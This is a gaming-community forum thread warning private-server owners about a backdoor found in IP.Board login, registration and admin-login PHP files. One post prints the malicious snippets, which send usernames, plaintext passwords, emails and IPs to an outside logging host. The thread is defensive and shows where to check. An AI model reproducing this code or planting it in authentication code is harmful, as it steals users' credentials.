Thread: Attention RSPS Owners [Very Important] IPB EXPLOIT

Page 1 of 2 12 LastLast
Results 1 to 10 of 19
  1. #1 Attention RSPS Owners [Very Important] IPB EXPLOIT 
    Registered Member Ikov's Avatar
    Join Date
    Nov 2013
    Posts
    301
    Thanks given
    295
    Thanks received
    627
    Rep Power
    5
    Hello guys,

    We've noticed some pretty disturbing stuff on our end, attention to all RSPS owners, please check this out;

    http://forum.ikovps.com/index.php?/t...should-notice/
    Reply With Quote  
     


  2. #2  
    Registered Member
    Benj's Avatar
    Join Date
    May 2015
    Posts
    327
    Thanks given
    249
    Thanks received
    142
    Rep Power
    347
    Respect for sharing BUMP.
    Attached image

    Reply With Quote  
     

  3. #3  
    Registered Member Whimzy's Avatar
    Join Date
    Sep 2013
    Age
    25
    Posts
    376
    Thanks given
    132
    Thanks received
    82
    Rep Power
    54
    Spoiler for Post from Ikov:
    Hello,

    As previous announcements regarding lower tier RSPS being breached and password cracked i have noticed a very disturbing piece of script planted in core PHP files of IPB to log user credentials in plaintext which is sent to a database server used to steal your data! DO NOT WORRY IKOV WAS NOT AFFECTED BUT MANY OTHER RSPS ARE!!!!!


    If you own a RSPS and you have concerns of being hacked or have previously been hacked here is how to check for password loggers.

    \admin\appilcations\core\modules_public\global\log in.php
    \admin\appilcations\core\modules_public\global\reg ister.php
    \admin\appilcations\core\modules_admin\login\manua lResolver.php



    On line login.php 114 - 128 there is a else statement that looks like this

    Code:
    else
    {
                                    if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
      {
      $ip = $_SERVER['REMOTE_ADDR'];
      }
      else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
      {
      $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
      }
                                            $user = str_replace(' ', '%20', $this->request['ips_username']);
                 $pass = str_replace(' ', '%20', $this->request['ips_password']);
    @file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Forum_Login&username=' . $user . '&password=' . $pass . '&email=N/A&ip=' . $ip);
         $this->registry->getClass('output')->redirectScreen( $return[0], $return[1] );
    }
    On line register.php 1768 - 1808

    Code:
     if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
      {
      $ip = $_SERVER['REMOTE_ADDR'];
      }
      else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
      {
      $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
      }
    
    $user = str_replace(' ', '%20', $this->request['members_display_name']);
    @file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $ip);
    On line manualResolver.php 228 - 253

    Code:
    /* Log them in public side if not already */
    $publicApi->logGuestInAsMember( $mem['member_id'] );
     
                            $user = str_replace(' ', '%20', $this->request['username']);
     
                            @file_get_contents('http://*.nl/logger/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=ACP_Login&username=' . $user . '&password=' . $this->request['password'] . '&email=' . $mem['email'] . '&ip=' . $_SERVER['REMOTE_ADDR']);


    If anyone didn't want to visit Ikov
    Reply With Quote  
     

  4. Thankful user:


  5. #4  
    Bossman

    ISAI's Avatar
    Join Date
    Sep 2012
    Posts
    1,916
    Thanks given
    655
    Thanks received
    1,366
    Rep Power
    5000
    Well thats a bug.
    Thanks for informing everyone
    Reply With Quote  
     

  6. #5  
    Member
    Join Date
    Apr 2015
    Posts
    212
    Thanks given
    6
    Thanks received
    58
    Rep Power
    0
    This IPB exploit post is like 3 weeks late...
    Reply With Quote  
     

  7. Thankful users:


  8. #6  
    Registered Member
    Actuvas's Avatar
    Join Date
    May 2013
    Age
    26
    Posts
    1,275
    Thanks given
    91
    Thanks received
    250
    Rep Power
    603
    Thanks David seen some people already abusing it.
    Reply With Quote  
     

  9. #7  
    Registered Member
    Join Date
    Dec 2011
    Posts
    793
    Thanks given
    204
    Thanks received
    176
    Rep Power
    173
    >ipb
    Reply With Quote  
     

  10. #8  
    Community Veteran

    Songoty's Avatar
    Join Date
    Dec 2007
    Posts
    2,740
    Thanks given
    211
    Thanks received
    1,034
    Rep Power
    2455
    i'm assuming that is a cracked ipb that is going around?
    Reply With Quote  
     

  11. #9  
    Registered Member

    Join Date
    Dec 2011
    Posts
    1,615
    Thanks given
    1,971
    Thanks received
    819
    Rep Power
    1049
    Quote Originally Posted by Songoty View Post
    i'm assuming that is a cracked ipb that is going around?
    I'm confused on this too. I know that they no longer have IP.Nexus encoded but I wouldn't imagine this is an out-of-the-box issue. Would be interesting
    Reply With Quote  
     

  12. #10  
    Community Veteran

    Songoty's Avatar
    Join Date
    Dec 2007
    Posts
    2,740
    Thanks given
    211
    Thanks received
    1,034
    Rep Power
    2455
    Quote Originally Posted by Murilirum View Post
    I'm confused on this too. I know that they no longer have IP.Nexus encoded but I wouldn't imagine this is an out-of-the-box issue. Would be interesting
    i highly doubt that it would be affecting legitimate copies of ipb. if so, that means there is a rather large exploit allowing people to replace files on someone's ipb installation. more likely than not this is a cracked ipb issue (and this is in no way a new issue, i recall similar things happening years ago with cracked vb installations)
    Reply With Quote  
     

Page 1 of 2 12 LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. ~~need help very important~~
    By Hamad68 in forum Help
    Replies: 3
    Last Post: 07-20-2013, 08:18 PM
  2. [508]read:very important[508]
    By Oblivious in forum Help
    Replies: 8
    Last Post: 06-17-2009, 11:25 PM
  3. [508]read:very important[508]
    By Oblivious in forum Tutorials
    Replies: 8
    Last Post: 06-17-2009, 11:25 PM
  4. Replies: 21
    Last Post: 01-23-2009, 12:07 PM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •